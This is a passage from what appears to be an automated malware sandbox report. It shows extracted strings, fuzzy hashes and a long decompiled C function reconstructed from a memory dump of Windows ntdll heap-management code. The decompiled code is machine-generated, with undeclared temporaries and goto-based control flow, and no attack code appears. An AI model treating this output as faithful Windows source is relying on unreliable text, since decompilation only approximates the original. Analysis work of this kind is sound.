                                                                                                            					_t49 = 0;
                                                                                                            					goto L8;
                                                                                                            				} else {
                                                                                                            					goto L9;
                                                                                                            				}
                                                                                                            			}





















                                                                                                            Strings
                                                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 010D932A
                                                                                                            • LdrpFindDllActivationContext, xrefs: 010D9331, 010D935D
                                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 010D933B, 010D9367
                                                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 010D9357
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                            • API String ID: 0-3779518884
                                                                                                            • Opcode ID: 8e96282de75bdf25f475b98291c6ab45267d5096918dee1348ffc7a24b6590c0
                                                                                                            • Instruction ID: 7ca29f4f0bbaab2f40f98532534436c9a0903c75ad28569ebd6aafb780f1fb6c
                                                                                                            • Opcode Fuzzy Hash: 8e96282de75bdf25f475b98291c6ab45267d5096918dee1348ffc7a24b6590c0
                                                                                                            • Instruction Fuzzy Hash: B9411962A0031DDFEFB56A1DC8B8A797AE5BB02308F05C1BBE9D457291E7705C809381
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                            • API String ID: 2994545307-336120773
                                                                                                            • Opcode ID: 22befa489922478f2894412f5264164e2bfe07e20dbb7981148c92f912a9f654
                                                                                                            • Instruction ID: f7f4f2f5850cf343b6d52f1cba982a73fb5313a82f6bac347128134b10ffe21f
                                                                                                            • Opcode Fuzzy Hash: 22befa489922478f2894412f5264164e2bfe07e20dbb7981148c92f912a9f654
                                                                                                            • Instruction Fuzzy Hash: CE3144B6200125FFD328DB99C885FAB77E8EF04A24F154069F586CF641E771A890CB69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E010899BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                                                                                            				char _v5;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				signed short _v20;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed short _t186;
                                                                                                            				intOrPtr _t187;
                                                                                                            				signed short _t190;
                                                                                                            				signed int _t196;
                                                                                                            				signed short _t197;
                                                                                                            				intOrPtr _t203;
                                                                                                            				signed int _t207;
                                                                                                            				signed int _t210;
                                                                                                            				signed short _t215;
                                                                                                            				intOrPtr _t216;
                                                                                                            				signed short _t219;
                                                                                                            				signed int _t221;
                                                                                                            				signed short _t222;
                                                                                                            				intOrPtr _t228;
                                                                                                            				signed int _t232;
                                                                                                            				signed int _t235;
                                                                                                            				signed int _t250;
                                                                                                            				signed short _t251;
                                                                                                            				intOrPtr _t252;
                                                                                                            				signed short _t254;
                                                                                                            				intOrPtr _t255;
                                                                                                            				signed int _t258;
                                                                                                            				signed int _t259;
                                                                                                            				signed short _t262;
                                                                                                            				intOrPtr _t271;
                                                                                                            				signed int _t279;
                                                                                                            				signed int _t282;
                                                                                                            				signed int _t284;
                                                                                                            				signed int _t286;
                                                                                                            				intOrPtr _t292;
                                                                                                            				signed int _t296;
                                                                                                            				signed int _t299;
                                                                                                            				signed int _t307;
                                                                                                            				signed int* _t309;
                                                                                                            				signed short* _t311;
                                                                                                            				signed short* _t313;
                                                                                                            				signed char _t314;
                                                                                                            				intOrPtr _t316;
                                                                                                            				signed int _t323;
                                                                                                            				signed char _t328;
                                                                                                            				signed short* _t330;
                                                                                                            				signed char _t331;
                                                                                                            				intOrPtr _t335;
                                                                                                            				signed int _t342;
                                                                                                            				signed char _t347;
                                                                                                            				signed short* _t348;
                                                                                                            				signed short* _t350;
                                                                                                            				signed short _t352;
                                                                                                            				signed char _t354;
                                                                                                            				intOrPtr _t357;
                                                                                                            				intOrPtr* _t364;
                                                                                                            				signed char _t365;
                                                                                                            				intOrPtr _t366;
                                                                                                            				signed int _t373;
                                                                                                            				signed char _t378;
                                                                                                            				signed int* _t381;
                                                                                                            				signed int _t382;
                                                                                                            				signed short _t384;
                                                                                                            				signed int _t386;
                                                                                                            				unsigned int _t390;
                                                                                                            				signed int _t393;
                                                                                                            				signed int* _t394;
                                                                                                            				unsigned int _t398;
                                                                                                            				signed short _t400;
                                                                                                            				signed short _t402;
                                                                                                            				signed int _t404;
                                                                                                            				signed int _t407;
                                                                                                            				unsigned int _t411;
                                                                                                            				signed short* _t414;
                                                                                                            				signed int _t415;
                                                                                                            				signed short* _t419;
                                                                                                            				signed int* _t420;
                                                                                                            				void* _t421;
                                                                                                            
                                                                                                            				_t414 = __edx;
                                                                                                            				_t307 = __ecx;
                                                                                                            				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                                                                                            				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                                                                                            					_v5 = _a8;
                                                                                                            					L3:
                                                                                                            					_t381 = _a4;
                                                                                                            					goto L4;
                                                                                                            				} else {
                                                                                                            					__eflags =  *(__ecx + 0x4c);
                                                                                                            					if( *(__ecx + 0x4c) != 0) {
                                                                                                            						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                                                                                            						 *_t419 = _t411;
                                                                                                            						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                                                                                            						__eflags = _t411 >> 0x18 - _t378;
                                                                                                            						if(__eflags != 0) {
                                                                                                            							_push(_t378);
                                                                                                            							E0111FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t250 = _a8;
                                                                                                            					_v5 = _t250;
                                                                                                            					__eflags = _t250;
                                                                                                            					if(_t250 != 0) {
                                                                                                            						_t400 = _t414[6];
                                                                                                            						_t53 =  &(_t414[4]); // -16
                                                                                                            						_t348 = _t53;
                                                                                                            						_t251 =  *_t348;
                                                                                                            						_v12 = _t251;
                                                                                                            						_v16 = _t400;
                                                                                                            						_t252 =  *((intOrPtr*)(_t251 + 4));
                                                                                                            						__eflags =  *_t400 - _t252;
                                                                                                            						if( *_t400 != _t252) {
                                                                                                            							L49:
                                                                                                            							_push(_t348);
                                                                                                            							_push( *_t400);
                                                                                                            							E0112A80D(_t307, 0xd, _t348, _t252);
                                                                                                            							L50:
                                                                                                            							_v5 = 0;
                                                                                                            							goto L11;
                                                                                                            						}
                                                                                                            						__eflags =  *_t400 - _t348;
                                                                                                            						if( *_t400 != _t348) {
                                                                                                            							goto L49;
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                                                            						_t407 =  *(_t307 + 0xb4);
                                                                                                            						__eflags = _t407;
                                                                                                            						if(_t407 == 0) {
                                                                                                            							L36:
                                                                                                            							_t364 = _v16;
                                                                                                            							_t282 = _v12;
                                                                                                            							 *_t364 = _t282;
                                                                                                            							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                                                                                            							__eflags = _t414[1] & 0x00000008;
                                                                                                            							if((_t414[1] & 0x00000008) == 0) {
                                                                                                            								L39:
                                                                                                            								_t365 = _t414[1];
                                                                                                            								__eflags = _t365 & 0x00000004;
                                                                                                            								if((_t365 & 0x00000004) != 0) {
                                                                                                            									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                                                            									_v12 = _t284;
                                                                                                            									__eflags = _t365 & 0x00000002;
                                                                                                            									if((_t365 & 0x00000002) != 0) {
                                                                                                            										__eflags = _t284 - 4;
                                                                                                            										if(_t284 > 4) {
                                                                                                            											_t284 = _t284 - 4;
                                                                                                            											__eflags = _t284;
                                                                                                            											_v12 = _t284;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									_t78 =  &(_t414[8]); // -8
                                                                                                            									_t286 = E010BD540(_t78, _t284, 0xfeeefeee);
                                                                                                            									_v16 = _t286;
                                                                                                            									__eflags = _t286 - _v12;
                                                                                                            									if(_t286 != _v12) {
                                                                                                            										_t366 =  *[fs:0x30];
                                                                                                            										__eflags =  *(_t366 + 0xc);
                                                                                                            										if( *(_t366 + 0xc) == 0) {
                                                                                                            											_push("HEAP: ");
                                                                                                            											E0106B150();
                                                                                                            										} else {
                                                                                                            											E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            										}
                                                                                                            										_push(_v16 + 0x10 + _t414);
                                                                                                            										E0106B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                                                            										_t292 =  *[fs:0x30];
                                                                                                            										_t421 = _t421 + 0xc;
                                                                                                            										__eflags =  *((char*)(_t292 + 2));
                                                                                                            										if( *((char*)(_t292 + 2)) != 0) {
                                                                                                            											 *0x1156378 = 1;
                                                                                                            											asm("int3");
                                                                                                            											 *0x1156378 = 0;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L50;
                                                                                                            							}
                                                                                                            							_t296 = E0108A229(_t307, _t414);
                                                                                                            							__eflags = _t296;
                                                                                                            							if(_t296 != 0) {
                                                                                                            								goto L39;
                                                                                                            							} else {
                                                                                                            								E0108A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                                                            								goto L50;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t373 =  *_t414 & 0x0000ffff;
                                                                                                            							while(1) {
                                                                                                            								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                                                                                            								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                                                                                            									_t301 = _t373;
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t299 =  *_t407;
                                                                                                            								__eflags = _t299;
                                                                                                            								if(_t299 == 0) {
                                                                                                            									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                                                            									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                                                            									break;
                                                                                                            								} else {
                                                                                                            									_t407 = _t299;
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t62 =  &(_t414[4]); // -16
                                                                                                            							E0108BC04(_t307, _t407, 1, _t62, _t301, _t373);
                                                                                                            							goto L36;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L11:
                                                                                                            					_t402 = _t419[6];
                                                                                                            					_t25 =  &(_t419[4]); // -16
                                                                                                            					_t350 = _t25;
                                                                                                            					_t254 =  *_t350;
                                                                                                            					_v12 = _t254;
                                                                                                            					_v20 = _t402;
                                                                                                            					_t255 =  *((intOrPtr*)(_t254 + 4));
                                                                                                            					__eflags =  *_t402 - _t255;
                                                                                                            					if( *_t402 != _t255) {
                                                                                                            						L61:
                                                                                                            						_push(_t350);
                                                                                                            						_push( *_t402);
                                                                                                            						E0112A80D(_t307, 0xd, _t350, _t255);
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            					__eflags =  *_t402 - _t350;
                                                                                                            					if( *_t402 != _t350) {
                                                                                                            						goto L61;
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                                                                                            					_t404 =  *(_t307 + 0xb4);
                                                                                                            					__eflags = _t404;
                                                                                                            					if(_t404 == 0) {
                                                                                                            						L20:
                                                                                                            						_t352 = _v20;
                                                                                                            						_t258 = _v12;
                                                                                                            						 *_t352 = _t258;
                                                                                                            						 *(_t258 + 4) = _t352;
                                                                                                            						__eflags = _t419[1] & 0x00000008;
                                                                                                            						if((_t419[1] & 0x00000008) != 0) {
                                                                                                            							_t259 = E0108A229(_t307, _t419);
                                                                                                            							__eflags = _t259;
                                                                                                            							if(_t259 != 0) {
                                                                                                            								goto L21;
                                                                                                            							} else {
                                                                                                            								E0108A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                                                                                            								goto L3;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						L21:
                                                                                                            						_t354 = _t419[1];
                                                                                                            						__eflags = _t354 & 0x00000004;
                                                                                                            						if((_t354 & 0x00000004) != 0) {
                                                                                                            							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                                                                                            							__eflags = _t354 & 0x00000002;
                                                                                                            							if((_t354 & 0x00000002) != 0) {
                                                                                                            								__eflags = _t415 - 4;
                                                                                                            								if(_t415 > 4) {
                                                                                                            									_t415 = _t415 - 4;
                                                                                                            									__eflags = _t415;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t91 =  &(_t419[8]); // -8
                                                                                                            							_t262 = E010BD540(_t91, _t415, 0xfeeefeee);
                                                                                                            							_v20 = _t262;
                                                                                                            							__eflags = _t262 - _t415;
                                                                                                            							if(_t262 != _t415) {
                                                                                                            								_t357 =  *[fs:0x30];
                                                                                                            								__eflags =  *(_t357 + 0xc);
                                                                                                            								if( *(_t357 + 0xc) == 0) {
                                                                                                            									_push("HEAP: ");
                                                                                                            									E0106B150();
                                                                                                            								} else {
                                                                                                            									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            								}
                                                                                                            								_push(_v20 + 0x10 + _t419);
                                                                                                            								E0106B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                                                                                            								_t271 =  *[fs:0x30];
                                                                                                            								_t421 = _t421 + 0xc;
                                                                                                            								__eflags =  *((char*)(_t271 + 2));
                                                                                                            								if( *((char*)(_t271 + 2)) != 0) {
                                                                                                            									 *0x1156378 = 1;
                                                                                                            									asm("int3");
                                                                                                            									 *0x1156378 = 0;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t381 = _a4;
                                                                                                            						_t414 = _t419;
                                                                                                            						_t419[1] = 0;
                                                                                                            						_t419[3] = 0;
                                                                                                            						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                                                                                            						 *_t419 =  *_t381;
                                                                                                            						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                                                                                            						L4:
                                                                                                            						_t420 = _t414 +  *_t381 * 8;
                                                                                                            						if( *(_t307 + 0x4c) == 0) {
                                                                                                            							L6:
                                                                                                            							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                                                                                            								__eflags =  *(_t307 + 0x4c);
                                                                                                            								if( *(_t307 + 0x4c) != 0) {
                                                                                                            									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                                                                                            									 *_t420 = _t390;
                                                                                                            									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                                                                                            									__eflags = _t390 >> 0x18 - _t328;
                                                                                                            									if(__eflags != 0) {
                                                                                                            										_push(_t328);
                                                                                                            										E0111FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                                                                                            									}
                                                                                                            								}
                                                                                                            								__eflags = _v5;
                                                                                                            								if(_v5 == 0) {
                                                                                                            									L94:
                                                                                                            									_t382 = _t420[3];
                                                                                                            									_t137 =  &(_t420[2]); // -16
                                                                                                            									_t309 = _t137;
                                                                                                            									_t186 =  *_t309;
                                                                                                            									_v20 = _t186;
                                                                                                            									_v16 = _t382;
                                                                                                            									_t187 =  *((intOrPtr*)(_t186 + 4));
                                                                                                            									__eflags =  *_t382 - _t187;
                                                                                                            									if( *_t382 != _t187) {
                                                                                                            										L63:
                                                                                                            										_push(_t309);
                                                                                                            										_push( *_t382);
                                                                                                            										_push(_t187);
                                                                                                            										_push(_t309);
                                                                                                            										_push(0xd);
                                                                                                            										L64:
                                                                                                            										E0112A80D(_t307);
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									__eflags =  *_t382 - _t309;
                                                                                                            									if( *_t382 != _t309) {
                                                                                                            										goto L63;
                                                                                                            									}
                                                                                                            									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                                                                                            									_t393 =  *(_t307 + 0xb4);
                                                                                                            									__eflags = _t393;
                                                                                                            									if(_t393 == 0) {
                                                                                                            										L104:
                                                                                                            										_t330 = _v16;
                                                                                                            										_t190 = _v20;
                                                                                                            										 *_t330 = _t190;
                                                                                                            										 *(_t190 + 4) = _t330;
                                                                                                            										__eflags = _t420[0] & 0x00000008;
                                                                                                            										if((_t420[0] & 0x00000008) == 0) {
                                                                                                            											L107:
                                                                                                            											_t331 = _t420[0];
                                                                                                            											__eflags = _t331 & 0x00000004;
                                                                                                            											if((_t331 & 0x00000004) != 0) {
                                                                                                            												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                                                                                            												_v12 = _t196;
                                                                                                            												__eflags = _t331 & 0x00000002;
                                                                                                            												if((_t331 & 0x00000002) != 0) {
                                                                                                            													__eflags = _t196 - 4;
                                                                                                            													if(_t196 > 4) {
                                                                                                            														_t196 = _t196 - 4;
                                                                                                            														__eflags = _t196;
                                                                                                            														_v12 = _t196;
                                                                                                            													}
                                                                                                            												}
                                                                                                            												_t162 =  &(_t420[4]); // -8
                                                                                                            												_t197 = E010BD540(_t162, _t196, 0xfeeefeee);
                                                                                                            												_v20 = _t197;
                                                                                                            												__eflags = _t197 - _v12;
                                                                                                            												if(_t197 != _v12) {
                                                                                                            													_t335 =  *[fs:0x30];
                                                                                                            													__eflags =  *(_t335 + 0xc);
                                                                                                            													if( *(_t335 + 0xc) == 0) {
                                                                                                            														_push("HEAP: ");
                                                                                                            														E0106B150();
                                                                                                            													} else {
                                                                                                            														E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            													}
                                                                                                            													_push(_v20 + 0x10 + _t420);
                                                                                                            													E0106B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                                                                                            													_t203 =  *[fs:0x30];
                                                                                                            													__eflags =  *((char*)(_t203 + 2));
                                                                                                            													if( *((char*)(_t203 + 2)) != 0) {
                                                                                                            														 *0x1156378 = 1;
                                                                                                            														asm("int3");
                                                                                                            														 *0x1156378 = 0;
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            											_t394 = _a4;
                                                                                                            											_t414[1] = 0;
                                                                                                            											_t414[3] = 0;
                                                                                                            											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                                                                                            											 *_t414 =  *_t394;
                                                                                                            											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                                                                                            											break;
                                                                                                            										}
                                                                                                            										_t207 = E0108A229(_t307, _t420);
                                                                                                            										__eflags = _t207;
                                                                                                            										if(_t207 != 0) {
                                                                                                            											goto L107;
                                                                                                            										}
                                                                                                            										E0108A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									_t342 =  *_t420 & 0x0000ffff;
                                                                                                            									while(1) {
                                                                                                            										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                                                                                            										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                                                                                            											break;
                                                                                                            										}
                                                                                                            										_t210 =  *_t393;
                                                                                                            										__eflags = _t210;
                                                                                                            										if(_t210 == 0) {
                                                                                                            											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                                                            											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                                                            											L103:
                                                                                                            											_t146 =  &(_t420[2]); // -16
                                                                                                            											E0108BC04(_t307, _t393, 1, _t146, _t212, _t342);
                                                                                                            											goto L104;
                                                                                                            										}
                                                                                                            										_t393 = _t210;
                                                                                                            									}
                                                                                                            									_t212 = _t342;
                                                                                                            									goto L103;
                                                                                                            								} else {
                                                                                                            									_t384 = _t414[6];
                                                                                                            									_t102 =  &(_t414[4]); // -16
                                                                                                            									_t311 = _t102;
                                                                                                            									_t215 =  *_t311;
                                                                                                            									_v20 = _t215;
                                                                                                            									_v16 = _t384;
                                                                                                            									_t216 =  *((intOrPtr*)(_t215 + 4));
                                                                                                            									__eflags =  *_t384 - _t216;
                                                                                                            									if( *_t384 != _t216) {
                                                                                                            										L92:
                                                                                                            										_push(_t311);
                                                                                                            										_push( *_t384);
                                                                                                            										E0112A80D(_t307, 0xd, _t311, _t216);
                                                                                                            										L93:
                                                                                                            										_v5 = 0;
                                                                                                            										goto L94;
                                                                                                            									}
                                                                                                            									__eflags =  *_t384 - _t311;
                                                                                                            									if( *_t384 != _t311) {
                                                                                                            										goto L92;
                                                                                                            									}
                                                                                                            									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                                                            									_t386 =  *(_t307 + 0xb4);
                                                                                                            									__eflags = _t386;
                                                                                                            									if(_t386 == 0) {
                                                                                                            										L79:
                                                                                                            										_t313 = _v16;
                                                                                                            										_t219 = _v20;
                                                                                                            										 *_t313 = _t219;
                                                                                                            										 *(_t219 + 4) = _t313;
                                                                                                            										__eflags = _t414[1] & 0x00000008;
                                                                                                            										if((_t414[1] & 0x00000008) == 0) {
                                                                                                            											L82:
                                                                                                            											_t314 = _t414[1];
                                                                                                            											__eflags = _t314 & 0x00000004;
                                                                                                            											if((_t314 & 0x00000004) != 0) {
                                                                                                            												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                                                            												_v12 = _t221;
                                                                                                            												__eflags = _t314 & 0x00000002;
                                                                                                            												if((_t314 & 0x00000002) != 0) {
                                                                                                            													__eflags = _t221 - 4;
                                                                                                            													if(_t221 > 4) {
                                                                                                            														_t221 = _t221 - 4;
                                                                                                            														__eflags = _t221;
                                                                                                            														_v12 = _t221;
                                                                                                            													}
                                                                                                            												}
                                                                                                            												_t127 =  &(_t414[8]); // -8
                                                                                                            												_t222 = E010BD540(_t127, _t221, 0xfeeefeee);
                                                                                                            												_v20 = _t222;
                                                                                                            												__eflags = _t222 - _v12;
                                                                                                            												if(_t222 != _v12) {
                                                                                                            													_t316 =  *[fs:0x30];
                                                                                                            													__eflags =  *(_t316 + 0xc);
                                                                                                            													if( *(_t316 + 0xc) == 0) {
                                                                                                            														_push("HEAP: ");
                                                                                                            														E0106B150();
                                                                                                            													} else {
                                                                                                            														E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            													}
                                                                                                            													_push(_v20 + 0x10 + _t414);
                                                                                                            													E0106B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                                                            													_t228 =  *[fs:0x30];
                                                                                                            													_t421 = _t421 + 0xc;
                                                                                                            													__eflags =  *((char*)(_t228 + 2));
                                                                                                            													if( *((char*)(_t228 + 2)) != 0) {
                                                                                                            														 *0x1156378 = 1;
                                                                                                            														asm("int3");
                                                                                                            														 *0x1156378 = 0;
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            											goto L93;
                                                                                                            										}
                                                                                                            										_t232 = E0108A229(_t307, _t414);
                                                                                                            										__eflags = _t232;
                                                                                                            										if(_t232 != 0) {
                                                                                                            											goto L82;
                                                                                                            										}
                                                                                                            										E0108A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                                                            										goto L93;
                                                                                                            									}
                                                                                                            									_t323 =  *_t414 & 0x0000ffff;
                                                                                                            									while(1) {
                                                                                                            										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                                                                                            										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                                                                                            											break;
                                                                                                            										}
                                                                                                            										_t235 =  *_t386;
                                                                                                            										__eflags = _t235;
                                                                                                            										if(_t235 == 0) {
                                                                                                            											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                                                            											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                                                            											L78:
                                                                                                            											_t111 =  &(_t414[4]); // -16
                                                                                                            											E0108BC04(_t307, _t386, 1, _t111, _t237, _t323);
                                                                                                            											goto L79;
                                                                                                            										}
                                                                                                            										_t386 = _t235;
                                                                                                            									}
                                                                                                            									_t237 = _t323;
                                                                                                            									goto L78;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							return _t414;
                                                                                                            						}
                                                                                                            						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                                                                                            						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                                                                                            						if(_t398 >> 0x18 != _t347) {
                                                                                                            							_push(_t347);
                                                                                                            							_push(0);
                                                                                                            							_push(0);
                                                                                                            							_push(_t420);
                                                                                                            							_push(3);
                                                                                                            							goto L64;
                                                                                                            						}
                                                                                                            						goto L6;
                                                                                                            					} else {
                                                                                                            						_t277 =  *_t419 & 0x0000ffff;
                                                                                                            						_v16 = _t277;
                                                                                                            						while(1) {
                                                                                                            							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                                                                                            							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t279 =  *_t404;
                                                                                                            							__eflags = _t279;
                                                                                                            							if(_t279 == 0) {
                                                                                                            								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                                                            								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                                                            								break;
                                                                                                            							} else {
                                                                                                            								_t404 = _t279;
                                                                                                            								_t277 =  *_t419 & 0x0000ffff;
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						E0108BC04(_t307, _t404, 1, _t350, _t277, _v16);
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            0x010d14a0
                                                                                                            0x010d14b3
                                                                                                            0x010d14bb
                                                                                                            0x00000000
                                                                                                            0x010d14bb
                                                                                                            0x010d1495
                                                                                                            0x01089a7c
                                                                                                            0x01089a7c
                                                                                                            0x01089a7f
                                                                                                            0x01089a7f
                                                                                                            0x01089a82
                                                                                                            0x01089a84
                                                                                                            0x01089a87
                                                                                                            0x01089a8a
                                                                                                            0x01089a8d
                                                                                                            0x01089a8f
                                                                                                            0x010d166a
                                                                                                            0x010d166a
                                                                                                            0x010d166b
                                                                                                            0x010d1674
                                                                                                            0x00000000
                                                                                                            0x010d1674
                                                                                                            0x01089a95
                                                                                                            0x01089a97
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01089aa0
                                                                                                            0x01089aa3
                                                                                                            0x01089aa9
                                                                                                            0x01089aab
                                                                                                            0x01089ad7
                                                                                                            0x01089ad7
                                                                                                            0x01089ada
                                                                                                            0x01089add
                                                                                                            0x01089adf
                                                                                                            0x01089ae2
                                                                                                            0x01089ae6
                                                                                                            0x01089b22
                                                                                                            0x01089b27
                                                                                                            0x01089b29
                                                                                                            0x00000000
                                                                                                            0x01089b2b
                                                                                                            0x010d15be
                                                                                                            0x00000000
                                                                                                            0x010d15be
                                                                                                            0x01089b29
                                                                                                            0x01089ae8
                                                                                                            0x01089ae8
                                                                                                            0x01089aeb
                                                                                                            0x01089aee
                                                                                                            0x010d15cb
                                                                                                            0x010d15d2
                                                                                                            0x010d15d5
                                                                                                            0x010d15d7
                                                                                                            0x010d15da
                                                                                                            0x010d15dc
                                                                                                            0x010d15dc
                                                                                                            0x010d15dc
                                                                                                            0x010d15da
                                                                                                            0x010d15e5
                                                                                                            0x010d15e9
                                                                                                            0x010d15ee
                                                                                                            0x010d15f1
                                                                                                            0x010d15f3
                                                                                                            0x010d15f9
                                                                                                            0x010d1600
                                                                                                            0x010d1604
                                                                                                            0x010d1624
                                                                                                            0x010d1629
                                                                                                            0x010d1606
                                                                                                            0x010d161c
                                                                                                            0x010d1621
                                                                                                            0x010d1637
                                                                                                            0x010d163e
                                                                                                            0x010d1643
                                                                                                            0x010d1649
                                                                                                            0x010d164c
                                                                                                            0x010d1650
                                                                                                            0x010d1656
                                                                                                            0x010d165d
                                                                                                            0x010d165e
                                                                                                            0x010d165e
                                                                                                            0x010d1650
                                                                                                            0x010d15f3
                                                                                                            0x01089af4
                                                                                                            0x01089af7
                                                                                                            0x01089afc
                                                                                                            0x01089b00
                                                                                                            0x01089b04
                                                                                                            0x01089b08
                                                                                                            0x01089b14
                                                                                                            0x010899fe
                                                                                                            0x01089a04
                                                                                                            0x01089a07
                                                                                                            0x00000000
                                                                                                            0x01089a29
                                                                                                            0x010d169c
                                                                                                            0x010d16a0
                                                                                                            0x010d16a5
